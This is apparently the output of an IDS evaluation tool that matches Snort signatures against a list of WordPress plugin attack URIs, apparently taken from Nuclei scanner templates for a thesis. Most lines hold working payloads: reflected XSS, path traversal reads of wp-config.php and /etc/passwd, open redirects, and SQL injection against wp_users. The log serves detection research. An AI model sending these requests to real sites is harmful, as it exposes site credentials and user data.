# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l wp-plugin.uri -r /home/kali/Downloads/reglas_javi/snort -t list -o /home/kali/TFG/inspectorlog/snort/web_estatica/owasp/opensource/nuclei/wp-plugin.clean
Packet [2]	Uri [/web/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [4]	Uri [/web/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [5]	Uri [/web/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2015542]
Packet [6]	Uri [/web/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8]	Uri [/web/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [9]	Uri [/web/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [10]	Uri [/web/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [12]	Uri [/web/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [13]	Uri [/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [16]	Uri [/web/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [17]	Uri [/web/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [18]	Uri [/web/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [20]	Uri [/web/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd]	Nattacks [1]	Signatures	[2014717]
Packet [22]	Uri [/web/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [25]	Uri [/web/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction]	Nattacks [1]	Signatures	[2009714]
Packet [26]	Uri [/web/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [29]	Uri [/web/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2014901]
Packet [30]	Uri [/web/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [33]	Uri [/web/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e]	Nattacks [1]	Signatures	[2009714]
Packet [34]	Uri [/web/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb]	Nattacks [1]	Signatures	[2009714]
Packet [37]	Uri [/web/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [38]	Uri [/web/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [41]	Uri [/web/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [42]	Uri [/web/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [43]	Uri [/web/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [44]	Uri [/web/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [45]	Uri [/web/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [47]	Uri [/web/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [50]	Uri [/web/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [51]	Uri [/web/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction]	Nattacks [1]	Signatures	[2009714]
Packet [52]	Uri [/web/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [55]	Uri [/web/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2014901]
Packet [57]	Uri [/web/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2006445]	[2009714]
Packet [59]	Uri [/web/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [61]	Uri [/web/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%2725So5oOcraleTLJcL2YQP8t9j36%27)>]	Nattacks [1]	Signatures	[2009714]
Packet [63]	Uri [/web/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [64]	Uri [/web/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10]	Nattacks [1]	Signatures	[41420]
Packet [65]	Uri [/web/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [66]	Uri [/web/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [67]	Uri [/web/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported]	Nattacks [1]	Signatures	[2009714]
Packet [68]	Uri [/web/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1]	Nattacks [1]	Signatures	[2009714]
Packet [69]	Uri [/web/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [70]	Uri [/web/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [73]	Uri [/web/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [75]	Uri [/web/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [76]	Uri [/web/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [78]	Uri [/web/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [79]	Uri [/web/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [80]	Uri [/web/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [81]	Uri [/web/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [82]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00]	Nattacks [1]	Signatures	[41420]
Packet [83]	Uri [/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [4]	Signatures	[34194]	[41421]	[2019137]	[2020221]
Packet [85]	Uri [/web/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [86]	Uri [/web/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [88]	Uri [/web/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [89]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [90]	Uri [/web/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [91]	Uri [/web/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [93]	Uri [/web/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [94]	Uri [/web/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb]	Nattacks [1]	Signatures	[2009714]
Packet [95]	Uri [/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [4]	Signatures	[34194]	[41421]	[2019137]	[2020221]
Packet [97]	Uri [/web/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [99]	Uri [/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [100]	Uri [/web/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [101]	Uri [/web/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [103]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [107]	Uri [/web/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2015609]
Packet [112]	Uri [/web/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%2725So5oOcraleTLJcL2YQP8t9j36%27)>]	Nattacks [1]	Signatures	[2009714]
Packet [114]	Uri [/web/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2014555]
Packet [116]	Uri [/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [117]	Uri [/web/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported]	Nattacks [1]	Signatures	[2009714]
Packet [118]	Uri [/web/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1]	Nattacks [1]	Signatures	[2009714]
Packet [119]	Uri [/web/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [120]	Uri [/web/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [121]	Uri [/web/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [122]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00]	Nattacks [1]	Signatures	[41420]
Packet [125]	Uri [/web/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [130]	Uri [/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [133]	Uri [/web/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [134]	Uri [/web/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [136]	Uri [/web/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [138]	Uri [/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	Nattacks [4]	Signatures	[34194]	[41421]	[2019137]	[2020221]
Packet [140]	Uri [/web/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [141]	Uri [/web/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [142]	Uri [/web/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [143]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [144]	Uri [/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com]	Nattacks [1]	Signatures	[2012998]
Packet [147]	Uri [/web/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22]	Nattacks [1]	Signatures	[2009714]
Packet [148]	Uri [/web/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [149]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/]	Nattacks [1]	Signatures	[2012998]
Packet [150]	Uri [/web/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [153]	Uri [/web/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [154]	Uri [/web/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2015609]
Packet [156]	Uri [/web/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1]	Nattacks [1]	Signatures	[2009714]
Packet [157]	Uri [/web/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [158]	Uri [/web/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym]	Nattacks [1]	Signatures	[2012998]
Packet [159]	Uri [/web/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [161]	Uri [/web/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [163]	Uri [/web/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [166]	Uri [/web/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [171]	Uri [/web/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [173]	Uri [/web/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [174]	Uri [/web/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [175]	Uri [/web/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [176]	Uri [/web/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [178]	Uri [/web/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [179]	Uri [/web/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [181]	Uri [/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2016194]
Packet [182]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [183]	Uri [/web/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [184]	Uri [/web/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [186]	Uri [/web/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [187]	Uri [/web/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1]	Nattacks [1]	Signatures	[2009714]
Packet [188]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/]	Nattacks [1]	Signatures	[2012998]
Packet [189]	Uri [/web/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [192]	Uri [/web/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [193]	Uri [/web/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [194]	Uri [/web/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [198]	Uri [/web/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [200]	Uri [/web/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [201]	Uri [/web/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [204]	Uri [/web/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [205]	Uri [/web/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22]	Nattacks [1]	Signatures	[2009714]
Packet [207]	Uri [/web/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users]	Nattacks [2]	Signatures	[2006445]	[2010963]
Packet [208]	Uri [/web/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [209]	Uri [/web/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2014656]
Packet [212]	Uri [/web/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [213]	Uri [/web/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [216]	Uri [/web/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [219]	Uri [/web/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [220]	Uri [/web/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc]	Nattacks [1]	Signatures	[2009714]
Packet [224]	Uri [/web/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [225]	Uri [/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [227]	Uri [/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2016194]
